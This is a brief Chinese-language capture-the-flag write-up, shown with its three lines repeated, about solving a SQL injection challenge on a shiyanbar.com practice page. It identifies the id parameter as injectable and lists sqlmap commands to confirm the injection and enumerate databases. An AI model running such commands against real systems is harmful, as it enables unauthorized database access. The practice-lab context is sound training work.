id=1为注入点 http://ctf5.shiyanbar.com/web/index_3.php?id=1然后就用sqlmap来跑一下 结果能出答案 我也是抱着尝试的态度 哈哈
首先检测注入点 sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_3.php?id=1”
然后再获取数据库sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs 下面出现了几个数据库
id=1为注入点 http://ctf5.shiyanbar.com/web/index_3.php?id=1然后就用sqlmap来跑一下 结果能出答案 我也是抱着尝试的态度 哈哈
首先检测注入点 sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_3.php?id=1”
然后再获取数据库sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs 下面出现了几个数据库